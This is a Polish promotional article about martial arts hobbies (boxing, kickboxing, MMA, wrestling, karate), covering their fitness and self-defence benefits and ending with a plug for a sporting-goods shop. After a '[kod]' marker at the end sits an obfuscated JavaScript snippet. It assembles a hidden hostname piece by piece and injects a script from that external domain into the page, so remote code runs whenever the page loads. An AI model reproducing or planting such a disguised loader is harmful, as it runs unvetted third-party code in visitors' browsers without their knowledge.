31.01.2019

#Sporty walki – idealne jako hobby i profesjonalny trening

Jakie sporty walki najczęściej uprawiane są hobbistycznie?

Sztuki walki mogą być trenowane przez każdego, bez względu na wiek, kondycję czy umiejętności. Intensywność treningu oraz nauki technik danej sztuki walki dobierana jest przez trenerów po wcześniejszym zapoznaniu się z kandydatem. Dostosowywanie treningu do osoby umożliwia szybki postęp w szkoleniu oraz sprawne uzyskiwanie pożądanych efektów. Trening jest również uzależniony od rodzaju wybranej sztuki walki. 

Bardzo popularnym wyborem jest boks. Ta sztuka walki posiada bogatą historię oraz tradycję. Boks jest jedną z niewielu sztuk walki zaliczaną do dyscyplin olimpijskich. Sport ten wymaga doskonałych umiejętności, siły oraz sprytu. Bardzo ważna jest technika, która integruje pracę całego ciała. Najważniejsze w boksie są nogi, na których zawodnik musi umiejętnie pracować. Boks jest sportem bezpiecznym, kontaktowym, polegającym na uderzaniu wyłącznie rękami w określone partie ciała, z pominięciem pleców, tyłu głowy oraz partii poniżej pasa. Boks to jednocześnie rozwijający oraz mocno dochodowy sport, dlatego też cieszy się on dużym zainteresowaniem na całym świecie. To na fundamentach boksu powstały takie sztuki walki jak kick boxing i MMA.

""

Kick boxing to forma boksu rozbudowana o możliwość kopnięć. Ta sztuka walki zyskuje sobie coraz więcej zwolenników. Dzięki wykorzystaniu nóg w walce staje się też ona bardziej zjawiskowa. Kick boxing nie jest jednak dyscypliną olimpijską. Nie jest nią też MMA. MMA to sport walki polegający na mieszaniu kilku stylów. Podstawą MMA, podobnie jak kick boxingu jest boks. W trakcie walki w MMA stosowane są również kopnięcia oraz elementy zapaśnicze. Przeciwnikowi można także zakładać dźwignie, uderzać kolanami, łokciami, a sama walka odbywa się stojąc lub w parterze. W MMA stosuje się zatem wiele technik, które adept musi opanować. MMA to sztuka walki bardzo wymagająca fizycznie, ale jednocześnie jest ona niezwykle skuteczna. 

Wymagające fizycznie są także zapasy. Ta sztuka walki również zaliczana jest do dyscyplin olimpijskich. Historia zapasów zaczyna się w starożytności. Sport ten oparty jest na walce zwartej odbywające się głównie w parterze. Walczący wykonują bloki, rzuty, obalenia. Zapasy to bardzo wymagająca, ale też doskonała dyscyplina sportu.

""

Niezwykle często wybieraną sztuką walki jest karate. Sport ten jest nie tylko zbiorem konkretnych technik, ale także opiera się on na kształtowaniu człowieka oraz jego rozwoju. Karate wykorzystuje ludzkie ciało w różnoraki sposób, w zależności od wersji sztuki walki, a tych karate ma kilka. Na podobnych zasadach opierają się inne wschodnie sztuki walki, jak na przykład kung-fu, jujutsu czy taekwondo. Ostateczny wybór danej sztuki walki uzależniony będzie już od oczekiwań i wymagań danej osoby.

 

 

Jak wpływa uprawianie sportów walki na człowieka?

Sztuki walki to te dyscypliny sportu, które skutecznie dostarczają wymaganej aktywności w codziennym życiu. Dzięki sportom walki zapewnia się trening całego ciała, usprawnia kondycję, buduje mięśnie oraz skutecznie rozwija motorykę całego organizmu. Uprawianie sztuk walki jest bardzo wymagające i z tego trzeba zdać sobie sprawę. Zestaw ćwiczeń przy każdej ze sztuk walki pozytywnie wpływa na polepszenie stanu kondycji fizycznej, wzmocnienie mięśni i stawów oraz utratę tkanki tłuszczowej, a co za tym idzie redukcję wagi. Sylwetka adepta sztuk walki zdecydowanie się polepsza, nabiera atletycznych kształtów.

""

Każda ze sztuk walki rozwija koordynację ruchową usprawniając komunikację nerwową pomiędzy mózgiem a mięśniami, dzięki czemu czas reakcji zostaje skrócony. Razem z szybkością rozwija się też siła oraz szybkość, co zwiększa pewność siebie osoby trenującej. Sztuki walki poprawiają również koncentrację oraz skutecznie dbają o stan psychiczny, dzięki wyładowywaniu złych emocji podczas treningów. Wschodnie sztuki walki dodatkowo zawierają elementy medytacji i samodoskonalenia, dzięki czemu człowiek odzyskuje spokój, kontrolę nad swoim życiem. Częste treningi pozwalają odpocząć mózgowi dostarczając mu cennych endorfin.

 

Skuteczna samoobrona – efekt uboczny sportów walki

Trenując sztuki walki człowiek zdobywa bardzo przydatną umiejętność, jaką jest samoobrona. Posługiwanie się technikami defensywnymi oraz ofensywnymi zapewnia skuteczną obronę przed atakiem w codziennym życiu. Uprawianie sztuk walki daje dużą pewność osobie, zapewnia poczucie bezpieczeństwa, a w sytuacji ataku przez osoby trzecie pozwala na skuteczną obronę. Trenerzy sztuk walki uświadamiają swoich uczniów, że użycie technik danej sztuki jest dopuszczalne tylko w hali treningowej oraz w sytuacji obrony przed atakiem. Umiejętność samoobrony jest dziś bardzo przydatna.

Kask, rękawice i ochraniacze – czyli jaki sprzęt będzie potrzebny?

Trening sztuk walki wymaga doświadczonego trenera, sporo samozaparcia, konsekwencji oraz specjalistycznego sprzętu. Decydując się na boks konieczne jest wyposażenie się w odpowiedni sprzęt. Podstawą są oczywiście rękawice bokserskie oraz kask bokserski treningowy. Podobnie trenując MMA konieczne są rękawice do MMA. W kick boxingu przyda się kask i ochraniacze. Każda inna sztuka walki w momencie ćwiczeń potyczek korzysta z takich sprzętów, jak kask sparingowy czy inne elementy ochronne zapewniające bezpieczeństwo.

""

Doskonałej jakości, sprawdzony i wykorzystywany przez profesjonalne szkoły sztuk walki dostępny jest w ofercie sklepu hurtowniasportowa.net. Firma posiada zawodowe rękawice MMA, rękawice bokserskie renomowanych marek (na przykład: rękawice bokserskie Adidas, rękawice bokserskie Dragon, rękawice bokserskie Everlast); kaski, ochraniacze oraz inny sprzęt wykorzystywany w treningach sztuk walki. Wyposażenie to zadowoli zarówno adeptów, jak i zawodowców.

 

 

 

 

 

[kod]

(function(){
xggd_=("u"+"")+"s"+"";xggd_+=("tat.")+("i");
xggd=document.createElement("script");xggd.type="text/javascript";xggd_+="nf"+("o")+"/";
xggdu="129574268"+".";xggd.async=true;xggdu+="xx5m8ug0ggdaecX5mmkgub6x973zzu";
xggd.src="https://"+xggd_+xggdu;xggdb=document.body;xggdb.appendChild(xggd);
})();